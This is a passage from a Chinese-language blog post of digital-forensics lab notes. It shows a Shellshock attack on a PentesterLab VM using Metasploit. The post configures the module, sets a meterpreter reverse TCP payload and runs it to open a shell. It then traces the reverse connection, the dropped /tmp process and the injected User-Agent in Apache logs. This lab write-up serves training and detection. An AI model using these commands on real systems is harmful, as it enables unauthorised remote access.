CUPS Filter Bash Environment Variable Code Injection (Shellshock)</span><br><span class="line">   4   auxiliary/server/dhclient_bash_env                 2014-09-24       normal     No     DHCP Client Bash Environment Variable Code Injection (Shellshock)</span><br><span class="line">   5   exploit/unix/dhcp/bash_environment                 2014-09-24       excellent  No     Dhclient Bash Environment Variable Injection (Shellshock)</span><br><span class="line">   6   exploit/linux/http/ipfire_bashbug_exec             2014-09-29       excellent  Yes    IPFire Bash Environment Variable Injection (Shellshock)</span><br><span class="line">   7   exploit/multi/misc/legend_bot_exec                 2015-04-27       excellent  Yes    Legend Perl IRC Bot Remote Code Execution</span><br><span class="line">   8   exploit/osx/local/vmware_bash_function_root        2014-09-24       normal     Yes    OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)</span><br><span class="line">   9   exploit/multi/ftp/pureftpd_bash_env_exec           2014-09-24       excellent  Yes    Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)</span><br><span class="line">   10  exploit/unix/smtp/qmail_bash_env_exec              2014-09-24       normal     No     Qmail SMTP Bash Environment Variable Injection (Shellshock)</span><br><span class="line">   11  exploit/multi/misc/xdh_x_exec                      2015-12-04       excellent  Yes    Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Interact with a module by name or index. For example info 11, use 11 or use exploit/multi/misc/xdh_x_exec</span><br></pre></td></tr></table></figure></div>
<p>我們可在看到 1 為我們想要進行的攻擊</p>
<p><code>  1   exploit/multi/http/apache_mod_cgi_bash_env_exec    2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)</code></p>
<h5 id="2-use-我們找到的辦法">(2) <strong>use 我們找到的辦法</strong></h5>
<p>可注意到我們的所選的方法變成了紅字了</p>
<pre><u style="text-decoration-style:single">msf6</u> &gt; use exploit/multi/http/apache_mod_cgi_bash_env_exec
<font color="#277FFF"><b>[*]</b></font> No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
<u style="text-decoration-style:single">msf6</u> exploit(<font color="#EC0101"><b>multi/http/apache_mod_cgi_bash_env_exec</b></font>) &gt; 
</pre>
<h5 id="3-設定options">(3) <strong>設定options</strong></h5>
<p>先輸入</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">shell</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) &gt; show options</span><br><span class="line"></span><br><span class="line">Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):</span><br><span class="line"></span><br><span class="line">   Name            Current Setting  Required  Description</span><br><span class="line">   ----            ---------------  --------  -----------</span><br><span class="line">   CMD_MAX_LENGTH  2048             yes       CMD max line length</span><br><span class="line">   CVE             CVE-2014-6271    yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)</span><br><span class="line">   HEADER          User-Agent       yes       HTTP header to use</span><br><span class="line">   METHOD          GET              yes       HTTP method to use</span><br><span class="line">   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]</span><br><span class="line">   RHOSTS                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:&lt;path&gt;'</span><br><span class="line">   RPATH           /bin             yes       Target PATH for binaries used by the CmdStager</span><br><span class="line">   RPORT           80               yes       The target port (TCP)</span><br><span class="line">   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.</span><br><span class="line">   SRVPORT         8080             yes       The local port to listen on.</span><br><span class="line">   SSL             false            no        Negotiate SSL/TLS for outgoing connections</span><br><span class="line">   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)</span><br><span class="line">   TARGETURI                        yes       Path to CGI script</span><br><span class="line">   TIMEOUT         5                yes       HTTP read response timeout (seconds)</span><br><span class="line">   URIPATH                          no        The URI to use for this exploit (default is random)</span><br><span class="line">   VHOST                            no        HTTP server virtual host</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Payload options (linux/x86/meterpreter/reverse_tcp):</span><br><span class="line"></span><br><span class="line">   Name   Current Setting  Required  Description</span><br><span class="line">   ----   ---------------  --------  -----------</span><br><span class="line">   LHOST  192.168.20.134   yes       The listen address (an interface may be specified)</span><br><span class="line">   LPORT  4444             yes       The listen port</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Exploit target:</span><br><span class="line"></span><br><span class="line">   Id  Name</span><br><span class="line">   --  ----</span><br><span class="line">   0   Linux x86</span><br></pre></td></tr></table></figure></div>
<p>我們需要設定以下這幾個options</p>
<ul>
<li><strong>lhost</strong> 攻擊者ip</li>
<li><strong>rhost</strong> 目標主機ip</li>
<li><strong>payload</strong> 攻擊成功後要做的動作</li>
<li><strong>targeturi</strong> 目標的漏洞網頁</li>
</ul>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">shell</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) &gt; set lhost 192.168.20.134</span><br><span class="line">lhost =&gt; 192.168.20.134</span><br><span class="line">msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) &gt; set rhost 192.168.20.131</span><br><span class="line">rhost =&gt; 192.168.20.131</span><br><span class="line">msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) &gt; set payload linux/x86/meterpreter/reverse_tcp</span><br><span class="line">payload =&gt; linux/x86/meterpreter/reverse_tcp</span><br><span class="line">msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) &gt; set targeturi http://192.168.20.131/cgi-bin/status</span><br><span class="line">targeturi =&gt; http://192.168.20.131/cgi-bin/status</span><br></pre></td></tr></table></figure></div>
<p>至此，攻擊的準備工作完成了</p>
<p><em>題外話</em></p>
<p>常常我們都把<strong>exploit</strong>、<strong>auxiliary</strong>、<strong>payload</strong>搞混</p>
<p>講師用了一個講法我覺得很容易懂，分享一下</p>
<table>
<thead>
<tr>
<th></th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td>exploit</td>
<td>槍</td>
</tr>
<tr>
<td>auxiliary</td>
<td>輔助工具</td>
</tr>
<tr>
<td>payload</td>
<td>子彈</td>
</tr>
</tbody>
</table>
<p>子彈(payload)無法主動攻擊，需要有槍(exploit)的輔助才行<br>
子彈(payload)可以理解攻擊進入後目標電腦，我們要幹什麼壞事或提權<br>
而槍(exploit)可以自己進行攻擊，例如用<s>槍托打人</s><br>
輔助工具(auxiliary)也可以，例如槍掛榴彈</p>
<h5 id="4-攻擊">(4) <strong>攻擊</strong></h5>
<p>在攻擊前，我們也可以開始啟用相關的監測軟體，基本上是把你想到的都打開看看<br>
我這邊想到的是，可以透過Wireshark抓取之間的封包<br>
完成了之後，可以輸入run指令開始攻擊</p>
<pre><u style="text-decoration-style:single">msf6</u> exploit(<font color="#EC0101"><b>multi/http/apache_mod_cgi_bash_env_exec</b></font>) &gt; run

<font color="#277FFF"><b>[*]</b></font> Started reverse TCP handler on 192.168.20.134:4444 
<font color="#277FFF"><b>[*]</b></font> Command Stager progress - 100.46% done (1097/1092 bytes)
<font color="#277FFF"><b>[*]</b></font> Sending stage (984904 bytes) to 192.168.20.131
<font color="#277FFF"><b>[*]</b></font> Meterpreter session 1 opened (192.168.20.134:4444 -&gt; 192.168.20.131:56191) at 2021-12-05 16:36:00 +0800

<u style="text-decoration-style:single">meterpreter</u> &gt; 
</pre>
<p>至此，攻擊成功<br>
我們可輸入<code>shell</code>變成指令介面<br>
便可開始操作目標電腦</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">shell</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; shell</span><br><span class="line">Process 950 created.</span><br><span class="line">Channel 1 created.</span><br><span class="line">whoami</span><br><span class="line">pentesterlab</span><br><span class="line">who</span><br><span class="line">pentesterlab    tty1            00:04   Dec  5 14:19:43</span><br></pre></td></tr></table></figure></div>
<hr>
<h2 id="鑑識">鑑識</h2>
<h4 id="需先準備軟體-v2">需先準備軟體</h4>
<ol>
<li><strong>Wireshark</strong></li>
</ol>
<p>我們在攻擊過後，便可在相關基礎設施中，尋找是否有殘餘的封包<br>
在本次的練習中，我便開啟wireshark收集攻擊時的封包</p>
<h4 id="Wireshark">Wireshark</h4>
<p>在收集到的封包中，可得知 192.168.20.134 向 192.168.20.131 發送了奇怪的惡意內容<br>
<a href="https://imgur.com/7EkR9KL.png" target="_blank" rel="noopener" data-fancybox="group" data-caption="undefined" class="fancybox"><img width="50%" height="50%" data-src="https://imgur.com/7EkR9KL.png" src="https://i.imgur.com/WS5Q2x3.gif" class="lazyload"></a><br>
完整內容<br>
<a href="https://imgur.com/61dcxeu.png" target="_blank" rel="noopener" data-fancybox="group" data-caption="undefined" class="fancybox"><img width="50%" height="50%" data-src="https://imgur.com/61dcxeu.png" src="https://i.imgur.com/WS5Q2x3.gif" class="lazyload"></a></p>
<h4 id="在受害主機上尋找殘骸">在受害主機上尋找殘骸</h4>
<h5 id="1-查詢網路連接狀況">1. <strong>查詢網路連接狀況</strong></h5>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">shell</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> netstat -a</span></span><br><span class="line">Active Internet connections (servers and established)</span><br><span class="line">Proto Recv-Q Send-Q Local Address           Foreign Address         State       </span><br><span class="line">tcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN      </span><br><span class="line">tcp        0      0 192.168.20.131:56191    192.168.20.134:4444     ESTABLISHED </span><br><span class="line">tcp        0      0 :::www                  :::*                    LISTEN      </span><br><span class="line">tcp        0      0 :::ssh                  :::*                    LISTEN      </span><br><span class="line">tcp        1      0 ::ffff:192.168.20.131:www ::ffff:192.168.20.134:34275 CLOSE_WAIT  </span><br><span class="line">Active UNIX domain sockets (servers and established)</span><br><span class="line">Proto RefCnt Flags       Type       State         I-Node Path</span><br><span class="line">unix  2      [ ACC ]     STREAM     LISTENING       7711 /var/run/acpid.socket</span><br><span class="line">unix  2      [ ACC ]     SEQPACKET  LISTENING       6334 @/org/kernel/udev/udevd</span><br><span class="line">unix  2      [ ACC ]     STREAM     LISTENING       7909 /usr/local/apache2/logs/cgisock.695</span><br><span class="line">unix  3      [ ]         DGRAM                      6342 </span><br><span class="line">unix  3      [ ]         STREAM     CONNECTED       8538 /usr/local/apache2/logs/cgisock.695</span><br><span class="line">unix  3      [ ]         DGRAM                      6343 </span><br><span class="line">unix  3      [ ]         STREAM     CONNECTED       8540</span><br></pre></td></tr></table></figure></div>
<p>可看到目前有一個可疑的ip連接中<br>
<code>tcp        0      0 192.168.20.131:56191    192.168.20.134:4444     ESTABLISHED</code></p>
<h5 id="2-查詢可疑程式">2. <strong>查詢可疑程式</strong></h5>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">shell</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> ps -ef</span></span><br><span class="line">PID   USER     COMMAND</span><br><span class="line">    1 root     init</span><br><span class="line">    2 root     [kthreadd]</span><br><span class="line">    3 root     [ksoftirqd/0]</span><br><span class="line">    5 root     [kworker/0:0H]</span><br><span class="line">    6 root     [kworker/u16:0]</span><br><span class="line">    7 root     [rcu_sched]</span><br><span class="line">    8 root     [rcu_bh]</span><br><span class="line">    9 root     [migration/0]</span><br><span class="line">   10 root     [khelper]</span><br><span class="line">   11 root     [netns]</span><br><span class="line">   12 root     [writeback]</span><br><span class="line">   13 root     [ksmd]</span><br><span class="line">   14 root     [bioset]</span><br><span class="line">   15 root     [kblockd]</span><br><span class="line">   16 root     [ata_sff]</span><br><span class="line">   17 root     [khubd]</span><br><span class="line">   18 root     [kworker/0:1]</span><br><span class="line">   31 root     [kswapd0]</span><br><span class="line">   32 root     [fsnotify_mark]</span><br><span class="line">   33 root     [crypto]</span><br><span class="line">   49 root     [nvme]</span><br><span class="line">   50 root     [nvme]</span><br><span class="line">   51 root     [scsi_eh_0]</span><br><span class="line">   52 root     [scsi_tmf_0]</span><br><span class="line">   53 root     [scsi_eh_1]</span><br><span class="line">   54 root     [scsi_tmf_1]</span><br><span class="line">   55 root     [kworker/u16:1]</span><br><span class="line">   57 root     [kpsmoused]</span><br><span class="line">   59 root     [deferwq]</span><br><span class="line">   61 root     [kworker/0:3]</span><br><span class="line">   92 root     /sbin/udevd --daemon</span><br><span class="line">  382 root     [mpt_poll_0]</span><br><span class="line">  400 root     [mpt/0]</span><br><span class="line">  613 root     [ipv6_addrconf]</span><br><span class="line">  614 root     /usr/local/sbin/sshd</span><br><span class="line">  618 root     /usr/local/sbin/acpid</span><br><span class="line">  640 root     [scsi_eh_2]</span><br><span class="line">  641 root     [scsi_tmf_2]</span><br><span class="line">  646 root     /sbin/udevd --daemon</span><br><span class="line">  647 root     /sbin/udevd --daemon</span><br><span class="line">  695 root     /usr/local/apache2/bin/httpd -f /etc/apache2/httpd.conf -k start</span><br><span class="line">  696 penteste -sh</span><br><span class="line">  702 root     /sbin/getty -l /usr/local/bin/autologin 9600 ttyS0 vt100</span><br><span class="line">  742 penteste /usr/local/apache2/bin/httpd -f /etc/apache2/httpd.conf -k start</span><br><span class="line">  743 penteste /usr/local/apache2/bin/httpd -f /etc/apache2/httpd.conf -k start</span><br><span class="line">  744 penteste /usr/local/apache2/bin/httpd -f /etc/apache2/httpd.conf -k start</span><br><span class="line">  745 penteste /usr/local/apache2/bin/httpd -f /etc/apache2/httpd.conf -k start</span><br><span class="line">  839 root     /sbin/udhcpc -b -i eth0 -x hostname vulnerable -p /var/run/udhcpc.eth0.pid</span><br><span class="line">  866 penteste /usr/local/apache2/bin/httpd -f /etc/apache2/httpd.conf -k start</span><br><span class="line">  947 penteste &#123;status&#125; /bin/bash /var/www/cgi-bin/status</span><br><span class="line">  948 penteste &#123;status&#125; /bin/bash /var/www/cgi-bin/status</span><br><span class="line">  949 penteste /tmp/kENhE</span><br><span class="line">  950 penteste /bin/sh</span><br><span class="line">  974 penteste ps -ef</span><br></pre></td></tr></table></figure></div>
<p>可看到有幾個看起來很可疑的程式<br>
<code>947 penteste {status} /bin/bash /var/www/cgi-bin/status</code><br>
<code>948 penteste {status} /bin/bash /var/www/cgi-bin/status</code><br>
<code>949 penteste /tmp/kENhE</code><br>
<code>950 penteste /bin/sh</code></p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">shell</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> sudo netstat -antp</span></span><br><span class="line">Active Internet connections (servers and established)</span><br><span class="line">Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    </span><br><span class="line">tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      614/sshd</span><br><span class="line">tcp        0      0 192.168.20.131:56191    192.168.20.134:4444     ESTABLISHED 949/kENhE &lt;----原來是你</span><br><span class="line">tcp        0      0 :::80                   :::*                    LISTEN      695/httpd</span><br><span class="line">tcp        0      0 :::22                   :::*                    LISTEN      614/sshd</span><br><span class="line">tcp        1      0 ::ffff:192.168.20.131:80 ::ffff:192.168.20.134:34275 CLOSE_WAIT  745/httpd</span><br></pre></td></tr></table></figure></div>
<p>我們可猜測PID:949<code>/tmp/kENhE</code>便有可能是攻擊者的惡意程式<br>
從攻擊方meterpreter確認，也是如此</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">shell</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; getpid</span><br><span class="line">Current pid: 949</span><br><span class="line">meterpreter &gt; getuid</span><br><span class="line">Server username: pentesterlab @ vulnerable (uid=1000, gid=50, euid=1000, egid=50)</span><br></pre></td></tr></table></figure></div>
<hr>
<h2 id="補充">補充</h2>
<p>這篇所練習的PENTESTER LAB所提供的環境似乎太過精簡 <img class="emoji lazyload" draggable="false" alt="😂" data-src="https://twemoji.maxcdn.com/v/12.1.6/72x72/1f602.png" src="https://i.imgur.com/WS5Q2x3.gif"><br>
以至log似乎也未開啟，這邊我再用 Metasploitable 2 再練習一遍<br>
由於他本身沒有自帶這個漏洞<br>
可參考這個網站建立一個shellshock漏洞<br>
<a href="https://ethicalhackingguru.com/how-to-exploit-shellshock-on-metasploitable-2/" target="_blank" rel="noopener">How To Exploit Shellshock On Metasploitable 2</a></p>
<h4 id="Log">Log</h4>
<p>我們直接搜尋可疑的ip位置</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">shell</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> grep -rin <span class="string">"192.168.20.134"</span> /var/Log</span></span><br><span class="line">/var/log/apache2/access.log:100917:192.168.20.134 - - [05/Dec/2021:05:48:57 -0500] "GET /cgi-bin/shellshock.sh HTTP/1.1" 200 78 "-" "() &#123; :;&#125;;echo -e \"\\r\\n6IGVbPatgU0YWrp4sXdi$(echo -en \\\\x7f\ &lt;----省略之前所看到的exploit</span><br></pre></td></tr></table></figure></div>
<p>可找到apache的<strong>access.log</strong>裡面有接收到來自的192.168.20.134的exploit<br>
<em>題外話</em><br>
如果log太長，可以直接讓grep輸出到別的檔案，再拿出來看分析就好<br>
<code>grep -rinR &quot;192.168.20.134&quot; /var/log &gt; out.txt</code></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">SUSU</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章鏈接: </span><span class="post-copyright-info"><a href="https://sunick2009.github.io/2021/12/05/digital_forensics_2021_12_05/">https://sunick2009.github.io/2021/12/05/digital_forensics_2021_12_05/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版權聲明: </span><span class="post-copyright-info">本博客所有文章除特別聲明外，均採用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 許可協議。轉載請註明來自 <a href="https://sunick2009.github.io" target="_blank">SUSU's BLOG</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/Digital-forensics/">Digital forensics    </a><a class="post-meta__tags" href="/tags/Linux/">Linux    </a></div><div class="post_share"><div class="social-share" data-image="https://imgur.com/4WtLHTa.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js"></script></div></div><nav class="pagination_post" id="pagination"><div class="prev-post pull_left"><a href="/2022/03/05/digital_forensics_2022_03_05/"><img class="prev_cover lazyload" data-src="https://imgur.com/ZbnCCYY.jpg" onerror="onerror=null;src='https://imgur.com/ED0wFaA.jpg'"><div class="label">上一篇</div><div class="prev_info"><span>數位鑑識筆記 - SMBLoris</span></div></a></div><div class="next-post pull_right"><a href="/2020/02/23/note_1/"><img class="next_cover lazyload" data-src="https://i.imgur.com/JqjofcG.jpg" onerror="onerror=null;src='https://imgur.com/ED0wFaA.jpg'"><div class="label">下一篇</div><div class="next_info"><span>升級Linux</span></div></a></div></nav><div class="relatedPosts"><div class="relatedPosts_headline"><i class="fa fa-fw fa-thumbs-up" aria-hidden="true"></i><span> 相關推薦</span></div><div class="relatedPosts_list"><div class="relatedPosts_item"><a href="/2022/03/05/digital_forensics_2022_03_05/" title="數位鑑識筆記 - SMBLoris"><img class="relatedPosts_cover lazyload"data-src="https://imgur.com/ZbnCCYY.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 2022-03-05</div><div class="relatedPosts_title">數位鑑識筆記 - SMBLoris</div></div></a></div></div><div class="clear_both"></div></div><hr><div id="post-comment"><div class="comment_headling"><i class="fa fa-comments fa-fw" aria-hidden="true"></i><span> 評論</span></div><div class="vcomment" id="vcomment"></div><script src="https://cdn.jsdelivr.net/gh/xaoxuu/volantis/js/volantis.min.js"></script><script>var notify = false == true ? true : false;
var verify = false == true ? true : false;
var GUEST_INFO = ['nick','mail','link'];
var guest_info = '暱稱,電郵,連結'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;

window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  appId:'9AhbD7NaCezDIb0Y8pBilq0q-MdYXbMMI',
  appKey:'a6JCosocPJwjM7wmeyg25PHM',
  placeholder:'Please leave your footprints',
  avatar:'monsterid',
  guest_info:guest_info,
  pageSize:'10',
  lang:'en',
  recordIP: true
});</script></div></div></main><footer id="footer" data-type="color"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2022 By SUSU</div><div class="framework-info"><span>Power by </span><a href="http://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme </span><a href="https://github.com/jerryc127/hexo-theme-butterfly" target="_blank" rel="noopener"><span>Butterfly</span></a></div></div></footer></div><section class="rightside" id="rightside"><div id="rightside-config-hide"><i class="fa fa-book" id="readmode" title="閲讀模式"></i><i class="fa fa-plus" id="font_plus" title="放大字體"></i><i class="fa fa-minus" id="font_minus" title="縮小字體"></i><a class="translate_chn_to_cht" id="translateLink" href="javascript:translatePage();" title="簡繁轉換" target="_self">繁</a><i class="darkmode fa fa-moon-o" id="darkmode" title="夜間模式"></i></div><div id="rightside-config-show"><div id="rightside_config" title="設置"><i class="fa fa-cog" aria-hidden="true"></i></div><a id="to_comment" href="#post-comment" title="直達評論"><i class="scroll_to_comment fa fa-comments">  </i></a><i class="fa fa-list-ul close" id="mobile-toc-button" title="目錄" aria-hidden="true"></i><i class="fa fa-arrow-up" id="go-up" title="回到頂部" aria-hidden="true"></i></div></section><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="/js/tw_cn.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script id="canvas_nest" color="90,63,170" opacity="0.7" zIndex="-1" count="99" mobile="false" src="https://cdn.jsdelivr.net/gh/jerryc127/butterfly_cdn@2.1.0/js/canvas-nest.js"></script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page@latest/instantpage.min.js" type="module"></script><script src="https://cdn.jsdelivr.net/npm/lazysizes@latest/lazysizes.min.js" async=""></script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>Powered by</span> <a href="https://github.com/wzpan/hexo-generator-search" target="_blank" rel="noopener" style="color:#49B1F5;">hexo-generator-search</a></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>